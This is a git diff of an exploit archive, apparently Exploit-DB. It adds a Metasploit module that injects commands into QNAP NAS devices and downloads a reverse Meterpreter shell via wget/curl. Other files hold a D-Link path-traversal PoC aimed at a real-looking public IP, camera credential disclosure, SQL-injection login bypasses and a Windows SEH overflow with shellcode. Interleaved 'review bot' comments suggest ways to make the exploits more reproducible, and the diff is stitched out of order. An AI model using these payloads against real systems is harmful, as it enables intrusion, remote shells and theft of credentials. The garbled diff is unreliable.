 24456,platforms/php/webapps/24456.txt,"glossword 1.8.12 - Multiple Vulnerabilities",2013-02-05,AkaStep,php,webapps,0
 24457,platforms/php/webapps/24457.txt,"Glossword 1.8.3 - SQL Injection",2013-02-05,AkaStep,php,webapps,0
@@ -27602,7 +27604,7 @@ id,file,description,date,author,platform,type,port
 24503,platforms/hardware/webapps/24503.txt,"Edimax EW-7206-APg and EW-7209APg - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0
 24475,platforms/hardware/webapps/24475.txt,"Linksys E1500/E2500 - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24476,platforms/hardware/webapps/24476.txt,"Linksys WAG200G - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
-24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
+24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 Rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
 24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x/5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
@@ -27847,7 +27849,7 @@ id,file,description,date,author,platform,type,port
 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,cgi,webapps,0
 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,php,webapps,0
 24973,platforms/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,php,webapps,0
-24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Hardware rev D3 / DIR-300 Hardware rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
+24975,platforms/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,hardware,webapps,0
 25089,platforms/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,php,webapps,0
 24986,platforms/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,cgi,webapps,0
 24987,platforms/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",php,webapps,0
@@ -32579,7 +32581,7 @@ id,file,description,date,author,platform,type,port
 31754,platforms/cgi/webapps/31754.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu WGate 'wgate.dll' ~service Parameter Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
 31755,platforms/cgi/webapps/31755.txt,"SAP Internet Transaction Server 6200.1017.50954.0 - Bu query String JavaScript Splicing Cross-Site Scripting",2008-05-08,Portcullis,cgi,webapps,0
 31760,platforms/windows/webapps/31760.txt,"Lotus Sametime 8.5.1 - Password Disclosure",2014-02-19,"Adriano Marcio Monteiro",windows,webapps,5081
-31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 Hardware vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
+31764,platforms/hardware/webapps/31764.txt,"D-Link DIR-615 vE4 Firmware 5.10 - Cross-Site Request Forgery",2014-02-19,"Dhruv Shah",hardware,webapps,80
 31765,platforms/hardware/webapps/31765.txt,"Barracuda Message Archiver 650 - Persistent Cross-Site Scripting",2014-02-19,Vulnerability-Lab,hardware,webapps,3378
 31768,platforms/php/webapps/31768.txt,"WordPress Plugin BP Group Documents 1.2.1 - Multiple Vulnerabilities",2014-02-19,"Tom Adams",php,webapps,80
 31771,platforms/php/webapps/31771.txt,"cPanel 11.x - scripts2/knowlegebase issue Parameter Cross-Site Scripting",2008-05-09,"Matteo Carli",php,webapps,0
@@ -32977,7 +32979,7 @@ id,file,description,date,author,platform,type,port
 32374,platforms/ios/webapps/32374.txt,"Wireless Drive 1.1.0 iOS - Multiple Web Vulnerabilities",2014-03-20,Vulnerability-Lab,ios,webapps,0
 32375,platforms/php/webapps/32375.txt,"OXID eShop < 4.7.11/5.0.11 / < 4.8.4/5.1.4 - Multiple Vulnerabilities",2014-03-20,//sToRm,php,webapps,0
 32383,platforms/php/webapps/32383.txt,"phpMyAdmin 3.2 - 'server_databases.php' Remote Command Execution",2008-09-15,"Norman Hippert",php,webapps,0
-32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L Hardware Version AX Firmware 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
+32385,platforms/hardware/webapps/32385.txt,"D-Link DIR-600L AX 1.00 - Cross-Site Request Forgery",2014-03-20,"Dhruv Shah",hardware,webapps,0
 32418,platforms/php/webapps/32418.txt,"EasyRealtorPRO 2008 - 'site_search.php' Multiple SQL Injections",2008-09-25,"David Sopas",php,webapps,0
 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0
 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-25,"Fabian Fingerle",php,webapps,0
@@ -38363,3 +38365,11 @@ id,file,description,date,author,platform,type,port
 42574,platforms/php/webapps/42574.txt,"Flash Poker 2.0 - 'game' Parameter SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
 42575,platforms/php/webapps/42575.txt,"Login-Reg Members Management PHP 1.0 - Arbitrary File Upload",2017-08-28,"Ihsan Sencan",php,webapps,0
 42578,platforms/php/webapps/42578.txt,"Schools Alert Management Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
+42579,platforms/json/webapps/42579.txt,"NethServer 7.3.1611 - Cross-Site Request Forgery / Cross-Site Scripting",2017-08-28,LiquidWorm,json,webapps,0
+42580,platforms/json/webapps/42580.html,"NethServer 7.3.1611 - Cross-Site Request Forgery (Create User / Enable SSH Access)",2017-08-28,LiquidWorm,json,webapps,0
+42581,platforms/hardware/webapps/42581.txt,"D-Link DIR-600 - Authentication Bypass",2017-08-29,"Jithin D Kurup",hardware,webapps,0
+42582,platforms/php/webapps/42582.txt,"Car or Cab Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
+42583,platforms/php/webapps/42583.txt,"PHP Appointment Booking Script - Authentication Bypass",2017-08-28,"Ali BawazeEer",php,webapps,0
+42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
+42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
+42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
diff --git a/platforms/hardware/remote/42587.rb
new file mode 100755
index 000000000..38384e993
--- /dev/null
+++ b/platforms/hardware/remote/42587.rb
@@ -0,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Exploit::CmdStager
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'QNAP Transcode Server Command Execution',
+ 'Description' => %q{
+ This module exploits an unauthenticated remote command injection
+ vulnerability in QNAP NAS devices. The transcoding server listens
+ on port 9251 by default and is vulnerable to command injection
+ using the 'rmfile' command.
+
+ This module was tested successfully on a QNAP TS-431 with
+ firmware version 4.3.3.0262 (20170727).
+ },
+ 'Author' =>
+ [
+ 'Zenofex', # Initial vulnerability discovery and PoC
+ '0x00string', # Initial vulnerability discovery and PoC
+ 'Brendan Coles ' # Metasploit
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'References' =>
+ [
+ [ 'URL', 'https://www.exploitee.rs/index.php/QNAP_TS-131' ],
+ [ 'URL', 'http://docs.qnap.com/nas/4.1/Home/en/index.html?transcode_management.htm' ]
+ ],
+ 'DisclosureDate' => 'Aug 6 2017',
+ 'Privileged' => true,
+ 'Arch' => ARCH_ARMLE,
+ 'DefaultOptions' =>
+ {
+ 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+ },
+ 'Targets' => [['Automatic', {}]],
+ 'CmdStagerFlavor' => %w{wget curl},
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(9251),
+ OptInt.new('DELAY', [true, 'How long to wait for the device to download the payload', 30])
+ ])
+ deregister_options 'cmdstager::decoder'
+ end
+
+ def check
+ vprint_status 'Connecting to transcode server...'
+
+ connect
+ sock.put "\x01\x00\x00\x00"
+ res = sock.get_once
+
+ if res.blank?
+ vprint_status 'No reply from server'
+ return CheckCode::Safe
+ end
+
+ vprint_status "Received response: #{res}"
+
+ return CheckCode::Detected if res.to_s =~ /client's request is accepted/
+
+ CheckCode::Safe
+ rescue ::Rex::ConnectionError
+ vprint_error 'Connection failed'
+ return CheckCode::Unknown
+ ensure
+ disconnect
+ end
+
+ def execute_command(cmd, opts)
+ # Filtered characters: 0x20 ! $ & 0x39 , ; = [ ] ^ ` { } %
+ # Execute each command seperately
+ cmd.split(';').each do |c|
+ connect
+ vprint_status "Executing command: #{c}"
+
+ # Replace spaces with tabs
+ c.tr! ' ', "\t"
+
+ sock.put "\x01\x00\x00\x00/|#{c}|\x00"
+ res = sock.get_once
+
+ unless res.to_s =~ /client's request is accepted/
+ print_status 'Unexpected reply'
+ break
+ end
+
+ print_status "Sent command successfully (#{c.length} bytes)"
+
+ disconnect
+
+ if c =~ /^(curl|wget)/
+ print_status "Waiting for the device to download the payload (#{datastore['DELAY']} seconds)..."
+ Rex.sleep datastore['DELAY']
+ end
+ end
+ rescue ::Rex::ConnectionError
+ fail_with Failure::Unreachable, 'Failed to connect to the transcode server'
+ ensure
+ disconnect
+ end
+
+ def exploit
+ vprint_status 'Connecting to transcode server...'
+ execute_cmdstager linemax: 400
+ end
+end
\ No newline at end of file
diff --git a/platforms/hardware/webapps/42581.txt
new file mode 100755
index 000000000..b2c449f1b
--- /dev/null
+++ b/platforms/hardware/webapps/42581.txt
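Review bot: In execute_command the `unless res.to_s =~ /client's request is accepted/` branch only prints 'Unexpected reply' and breaks, so when the device rejects one stager command the remaining commands are skipped silently and exploit goes on to wait for a session that cannot arrive; failing loudly is clearer: `fail_with Failure::UnexpectedReply, "Unexpected reply: #{res.inspect}"`. The filtered-character comment lists `0x39`, which is ASCII '9' rather than a shell metacharacter — presumably a typo for whichever byte is actually blocked — and since the stager's correctness rests on that list it is worth confirming against the original PoC; the same comment spells 'seperately' for 'separately'. A small robustness point: `cmd.split(';')` would also split a `;` inside a quoted argument, which the wget/curl flavors do not produce today but a future flavor might.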
@@ -0,0 +1,53 @@ +# Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack) +# CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943 +# Date: 29-08-2017 +# Exploit Author: Jithin D Kurup +# Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142 +# Vendor : www.dlink.com +# Version: Hardware version: B1 +Firmware version: 2.01 +# Tested on:All Platforms + + +1) Description + +After Successfully Connected to D-Link DIR-600 +Router(FirmWare Version : 2.01), Any User Can Easily Bypass The Router's +Admin Panel Just by adding a simple payload into URL. + +D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to +read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, +as demonstrated by discovering the admin password. + +Its More Dangerous when your Router has a public IP with remote login +enabled. + + +IN MY CASE, +Tested Router IP : http://190.164.170.249 + + + +Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ + +2) Proof of Concept + +Step 1: Go to +Router Login Page : http://190.164.170.249:8080 + +Step 2: +Add the payload to URL. + +Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd + + + +Bingooo You got admin Access on router. +Now you can download/upload settiing, Change setting etc. + + + + +---------------Greetz---------------- ++++++++++++ www.0seccon.com ++++++++++++ +Saran,Dhani,Gem,Vignesh,Hemanth,Sudin,Vijith \ No newline at end of file diff --git a/platforms/hardware/webapps/42588.txt b/platforms/hardware/webapps/42588.txt new file mode 100755 index 000000000..512c2f5be --- /dev/null +++ b/platforms/hardware/webapps/42588.txt 
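Review bot: The 'Tested Router IP' line and both PoC steps use a concrete public address, 190.164.170.249, which reads as a live third-party device; an advisory should use a placeholder such as `http://<router-ip>:8080/model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd` so readers do not send requests to someone else's router. 'Tested on: All Platforms' says nothing about the device — the hardware revision B1 and firmware 2.01 already given are the real test scope and the line should repeat those. The title calls this an authentication bypass, but the text describes reading /var/etc/httpasswd through REQUIRE_FILE, i.e. credential disclosure via absolute path traversal that then yields admin login; naming it that way matches the CVE description quoted in the file.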
@@ -0,0 +1,117 @@ +1. Advisory Information +======================================== +Title: + +Brickcom IP-Camera Remote Credentials and Settings Disclosure + + +Vendor Homepage: + +http://www.brickcom.com + +Tested on Camera types: + +WCB-040Af, WCB-100A, WCB-100Ae, OB-302Np, OB-300Af, OB-500Af + + +Remotely Exploitable: + +Yes + +Vulnerability: + +Username / Password / Settings Disclosure (Critical) + +Shodan Dork: + +title:"Brickcom" + + +Date: + +14/12/2016 + +Authors: + +Emiliano Ipar (@maninoipar) (linkedin.com/in/emilianoipar) + +Ignacio Agustín Lizaso (@ignacio_lizaso) (linkedin.com/in/ignacio- +lizaso-9ab73359) +Gastón Emanuel Rivadero (@derlok_epsilon) (linkedin.com/in/gaston- +emanuel-rivadero-858b9ba) + + +2. CREDIT +======================================== +This vulnerability was identified during penetration test and Research by +Emiliano Ipar, Ignacio Lizaso and Gastón Rivadero. + + +3. Description +======================================== +Brickom Cameras allow a low-privilege user to disclose every configuration +in the NVRAM, including credentials in clear text, remotely by making a +simple requests. This vulnerability, coupled with the fact that there are +two default users with known passwords which are rarely modified, allows an +attacker to disclose the admin password and latter every config. + +The most Critical API call is users.cgi?action=getUsers, which provides +every user credential. Many other API calls to get information for the WIFI +password or FTP credentials, even the whole configuration, are affected +depending on the camera model. + +On the hardware side, the UART console of some models (example: WCB-040Af, +with baudrate 38400) is exposed in the PCB and after soldering the +corresponding pins and connecting, the resulting shell has root access. A +simple NVSHOW command will list every config available in clear text, +including credentials. + + +4. 
Proof-of-Concept: +======================================== +Using the following GET request: + +curl http://:/cgi-bin/users.cgi?action=getUsers -u user:pass -v + +Request: +---------- +> GET /cgi-bin/users.cgi?action=getUsers HTTP/1.1 +> Authorization: Basic +> User-Agent: curl/7.35.0 +> Host: : +> Accept: */* +> + + +Response: +---------- +< HTTP/1.1 200 Ok +< Server: mini_httpd +< Cache-Control: no-cache +< Pragma: no-cache +< Expires: 0 +< Content-Type: text/html +< Connection: close +< +size=3 +User1.index=0 +User1.username=admin +User1.password=admin +User1.privilege=1 + +User2.index=1 +User2.username=viewer +User2.password=viewer +User2.privilege=0 + +User3.index=3 +User3.username=rviewer +User3.password=rviewer +User3.privilege=2 + +5. SOLUTION +======================================== +The vendor has been contacted and the firmware was updated. See disclosure +in: + +https://www.brickcom.com/news/productCERT_security_advisorie.php diff --git a/platforms/json/webapps/42579.txt b/platforms/json/webapps/42579.txt new file mode 100755 index 000000000..467950c09 --- /dev/null +++ b/platforms/json/webapps/42579.txt 
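Review bot: The PoC request as shown has lost its placeholders — `curl http://:/cgi-bin/users.cgi?action=getUsers` and `Host: :` have nothing between the colons, and `Authorization: Basic` carries no value — presumably angle-bracketed tokens stripped on the way in; spelling them as `http://HOST:PORT/cgi-bin/users.cgi?action=getUsers` keeps them readable. The description says a low-privilege account is enough, so the PoC should say which one `-u user:pass` stands for (the response lists `viewer:viewer` with privilege 0, if that is the account meant), since that is what makes this critical. The credentials in the response body are the documented defaults rather than real secrets, but saying so explicitly avoids a reader treating them as leaked customer data.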
@@ -0,0 +1,60 @@ +NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability + + +Vendor: NethServer.org +Product web page: https://www.nethserver.org +Affected version: 7.3.1611-u1-x86_64 + +Summary: NethServer is an operating system for the Linux enthusiast, +designed for small offices and medium enterprises. It's simple, secure +and flexible. + +Desc: NethServer suffers from an authenticated stored XSS vulnerability. +Input passed to the 'BackupConfig[Upload][Description]' POST parameter is +not properly sanitised before being returned to the user. This can be exploited +to execute arbitrary HTML and script code in a user's browser session in +context of an affected site. + +Tested on: Kernel 3.10.0.-514.el7.x86_64 on an x86_64 + CentOS Linux 7.3.1611 (Core) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5432 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5432.php + + +16.08.2017 + +-- + + +PoC request: + +POST /en-US/BackupConfig/Upload.json HTTP/1.1 +Host: 172.19.0.195:980 +Connection: close +Content-Length: 15762 +Accept: */* +Origin: https://172.19.0.195:980 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8FfEu2Tn6fUOnT80 +Referer: https://172.19.0.195:980/en-US/BackupConfig +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: nethgui=4igflab8fmbi5aq26pvsp5r0f2 + +------WebKitFormBoundary8FfEu2Tn6fUOnT80 +Content-Disposition: form-data; name="arc"; filename="backup-config.7z.xz" +Content-Type: application/x-xz + +[xz content omitted] +------WebKitFormBoundary8FfEu2Tn6fUOnT80 +Content-Disposition: form-data; name="BackupConfig[Upload][Description]" + + +------WebKitFormBoundary8FfEu2Tn6fUOnT80-- + 
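Review bot: The title says 'CSRF Script Insertion' while the description says 'authenticated stored XSS', and the PoC request carries a session cookie, an `Origin` header and `X-Requested-With: XMLHttpRequest` — a forged cross-site form cannot set X-Requested-With without a CORS preflight, so whether this is also exploitable as CSRF depends on the server not checking that header, which the advisory does not show; state which of the two it is. The `BackupConfig[Upload][Description]` part in the PoC is empty, so the payload that is supposed to be echoed back does not appear as shown — presumably stripped as HTML — and should be given in escaped form so the request is reproducible.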
diff --git a/platforms/json/webapps/42580.html b/platforms/json/webapps/42580.html new file mode 100755 index 000000000..1288eb621 --- /dev/null +++ b/platforms/json/webapps/42580.html @@ -0,0 +1,58 @@ + + + +HTML Decoded PoC: + + + + +
+ + + + + + + + + + + + + +
+
+
diff --git a/platforms/linux/local/394.c b/platforms/linux/local/394.c
index f784d6a34..b98902bef 100755
--- a/platforms/linux/local/394.c
+++ b/platforms/linux/local/394.c
@@ -1,7 +1,8 @@
 /*
  * This is simple local exploit (Proof of Concept?) for local bug in ProFTPd
  * not in default options (must be configured with option --enable-ctrls).
- * Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look:
+ * Bug exist in func
+tion pr_ctrls_connect() in file "src/ctrls.c", look:
  *
  * "src/ctrls.c"
  * int pr_ctrls_connect(const char *socket_file) {
diff --git a/platforms/php/webapps/42582.txt
new file mode 100755
index 000000000..bd91e1808
--- /dev/null
+++ b/platforms/php/webapps/42582.txt
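Review bot: The only change to 394.c splits the word 'function' inside the header comment into `+ * Bug exist in func` and `+tion pr_ctrls_connect() in file "src/ctrls.c", look:`, which looks like an accidental line break from an editor rather than an intended edit; the original single line `- * Bug exist in function pr_ctrls_connect() in file "src/ctrls.c", look:` should be restored. It sits inside the opening `/* ... */` block so it still compiles, but the comment is now corrupted and the hunk adds nothing.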
@@ -0,0 +1,46 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# Car or Cab Booking Script - SQL injection login bypass +# +# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin of the particular school +# +# Proof of Concept : - +# +# http://localhost/taxibooking/login.php [ set username and password ] to >> admin' or 1=1 -- - +# you must choose the check box as current and existing user +# +# +# +# +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42583.txt b/platforms/php/webapps/42583.txt new file mode 100755 index 000000000..87e6ce0d7 --- /dev/null +++ b/platforms/php/webapps/42583.txt 
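Review bot: The description says the attacker can 'login as admin of the particular school', but the product here is a car/cab booking script — the sentence appears carried over from the Schools Alert Management advisory and should read 'login as admin of the application'. The banner has no Exploit Title/Vendor/Version lines, so only the files.csv entry identifies the software; a line such as `# Exploit Title: Car or Cab Booking Script - SQL Injection Login Bypass` plus a vendor link would make the file self-describing. The note 'you must choose the check box as current and existing user' is the one detail that makes the PoC reproducible and deserves to be a numbered step rather than an aside.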
@@ -0,0 +1,42 @@ +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # + + + +# ======================================================== +# +# +# +# +# Description : an attacker is able to inject malicious sql query to bypass the login page and login as admin +# +# Proof of Concept : - +# +# http://localhost/appointment/admin_login.php [ set username and password ] to >> admin' or 1=1 -- - +# +# +# +# +# ======================================================== +# [+] Disclaimer +# +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and that due +# credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit is given to +# the author. The author is not responsible for any misuse of the information contained +# herein and prohibits any malicious use of all security related information +# or exploits by the author or elsewhere. +# +# +# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # \ No newline at end of file diff --git a/platforms/php/webapps/42584.txt b/platforms/php/webapps/42584.txt new file mode 100755 index 000000000..e2d6e74af --- /dev/null +++ b/platforms/php/webapps/42584.txt 
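Review bot: The banner's title lines are blank, so the advisory never names the software or version it targets — only the files.csv entry 'PHP Appointment Booking Script - Authentication Bypass' does; a line such as `# Exploit Title: PHP Appointment Booking Script - SQL Injection Login Bypass` with vendor and date lines belongs here. The PoC says to set both username and password to `admin' or 1=1 -- -`; if the injection is in one field only, saying which (and that the other can be anything) removes the guesswork.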
@@ -0,0 +1,53 @@ +----------------------------------------------------------------------------------- +| + +|---------------------------------------------------------------------------------- + +1) admin dashboard authentication bypass + +Description : An Attackers are able to completely compromise the web application built upon +the user login and management php script as they can gain access to the admin panel and +manage other users as an admin without authentication! + + +Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php +Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php + + +Risk : Unauthenticated attackers are able to gain full access to the administrator panel +and thus have total control over the application and users , including add admin user .. etc + + +|---------------------------------------------------------------------------------- + + +2) account takeover - cross side request forgery + + +Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password + +> exploitation < + + + + +
+ + + + + + +|-----------------------------------------EOF----------------------------------------- diff --git a/platforms/php/webapps/42585.txt b/platforms/php/webapps/42585.txt new file mode 100755 index 000000000..1e4dea35b --- /dev/null +++ b/platforms/php/webapps/42585.txt @@ -0,0 +1,30 @@ +# # # # # +# Exploit Title: PHP Video Battle Script 1.0 - SQL Injection +# Dork: N/A +# Date: 28.08.2017 +# Vendor Homepage: http://www.rocky.nu/ +# Software Link: http://www.rocky.nu/product/php-video-battle/ +# Demo: http://videobattle.rocky.nu/ +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Social: @ihsansencan +# # # # # +# Description: +# The vulnerability allows an attacker to inject sql commands.... +# +# Proof of Concept: +# +# http://localhost/[PATH]/[SQL].html +# +# -1'+uNiOn+SeleCt++0x31,0x32,0x33,0x34,0x35,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x37+--+--+-.html +# +# http://localhost/[PATH]/videobattle.html?vote=[SQL] +# http://localhost/[PATH]/videobattle.html?draw=[SQL] +# +# Etc.. +# # # # # \ No newline at end of file diff --git a/platforms/windows/local/42586.py b/platforms/windows/local/42586.py new file mode 100755 index 000000000..91aceb7f7 --- /dev/null +++ b/platforms/windows/local/42586.py 
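Review bot: Item 1's bypass is shown only as 'create a rule in No-Redirect add-on', which leaves the root cause implicit — apparently admin/dashboard.php sends its content before the redirect to index.php takes effect, so suppressing the redirect exposes it; say that directly and, if it is what was observed, note that any client that ignores 3xx (`curl -s http://localhost/LoginDashboard/admin/dashboard.php`) reproduces it without a browser add-on. The CSRF section ends at '> exploitation <' followed by blank lines, so the crafted form the text promises does not appear as shown and should be included in escaped form together with the password-change endpoint it posts to. The banner's product line is also blank; state the script name and version.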
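Review bot: The first PoC, `http://localhost/[PATH]/[SQL].html`, gives a UNION payload but not the page or parameter it is injected into, so it cannot be reproduced from the advisory; the later lines show `videobattle.html?vote=[SQL]` and `?draw=[SQL]`, and the first example should name its route and parameter the same way. The payload ending in `+--+--+-.html` suggests the rewritten URL carries the injection in a path segment — one sentence on the routing would explain why the `.html` suffix is part of the payload.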
@@ -0,0 +1,59 @@
+
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title: Easy Vedio to PSP Converter 1.6.20 - Local Buffer Overflow (SEH)
+# Date: 28-08-2017
+# Exploit Author: Kishan Sharma
+# Email : thekishansharma@gmail.com
+# Vulnerable Software: Easy Vedio to PSP Converter
+# Vendor Homepage: http://www.divxtodvd.net/
+# Version: 1.6.20
+# Software Link: http://www.divxtodvd.net/easy_video_to_psp.exe
+# Tested On: Windows 7 x64
+# To reproduce the exploit:
+# 1. Click Register
+# 2. In the "Enter User Name" field, paste the content of test.txt
+#
+##############################################################################
+
+
+buffer = "\x41" * 1008 #Junk
+
+nSEH = "\xeb\x10\x90\x90" #Short Jump
+
+# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+SEH = "\x59\x78\x03\x10"
+
+badchars = "\x00\x0a\x0d" # and 0x80 to 0xff
+
+# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f python
+buf = ""
+buf += "\xda\xd7\xd9\x74\x24\xf4\xba\x07\xc8\xf9\x11\x5e\x2b"
+buf += "\xc9\xb1\x31\x31\x56\x18\x03\x56\x18\x83\xee\xfb\x2a"
+buf += "\x0c\xed\xeb\x29\xef\x0e\xeb\x4d\x79\xeb\xda\x4d\x1d"
+buf += "\x7f\x4c\x7e\x55\x2d\x60\xf5\x3b\xc6\xf3\x7b\x94\xe9"
+buf += "\xb4\x36\xc2\xc4\x45\x6a\x36\x46\xc5\x71\x6b\xa8\xf4"
+buf += "\xb9\x7e\xa9\x31\xa7\x73\xfb\xea\xa3\x26\xec\x9f\xfe"
+buf += "\xfa\x87\xd3\xef\x7a\x7b\xa3\x0e\xaa\x2a\xb8\x48\x6c"
+buf += "\xcc\x6d\xe1\x25\xd6\x72\xcc\xfc\x6d\x40\xba\xfe\xa7"
+buf += "\x99\x43\xac\x89\x16\xb6\xac\xce\x90\x29\xdb\x26\xe3"
+buf += "\xd4\xdc\xfc\x9e\x02\x68\xe7\x38\xc0\xca\xc3\xb9\x05"
+buf += "\x8c\x80\xb5\xe2\xda\xcf\xd9\xf5\x0f\x64\xe5\x7e\xae"
+buf += "\xab\x6c\xc4\x95\x6f\x35\x9e\xb4\x36\x93\x71\xc8\x29"
+buf += "\x7c\x2d\x6c\x21\x90\x3a\x1d\x68\xfe\xbd\x93\x16\x4c"
+buf += "\xbd\xab\x18\xe0\xd6\x9a\x93\x6f\xa0\x22\x76\xd4\x5e"
+buf += "\x69\xdb\x7c\xf7\x34\x89\x3d\x9a\xc6\x67\x01\xa3\x44"
+buf += "\x82\xf9\x50\x54\xe7\xfc\x1d\xd2\x1b\x8c\x0e\xb7\x1b"
+buf += "\x23\x2e\x92\x7f\xa2\xbc\x7e\xae\x41\x45\xe4\xae"
+
+nops = "\x90" * 16 #Nops
+
+badchars = "\x0a\x0d"
+
+data = buffer + nSEH + SEH + nops + buf
+
+f = open ("test.txt", "w")
+f.write(data)
+f.close()
+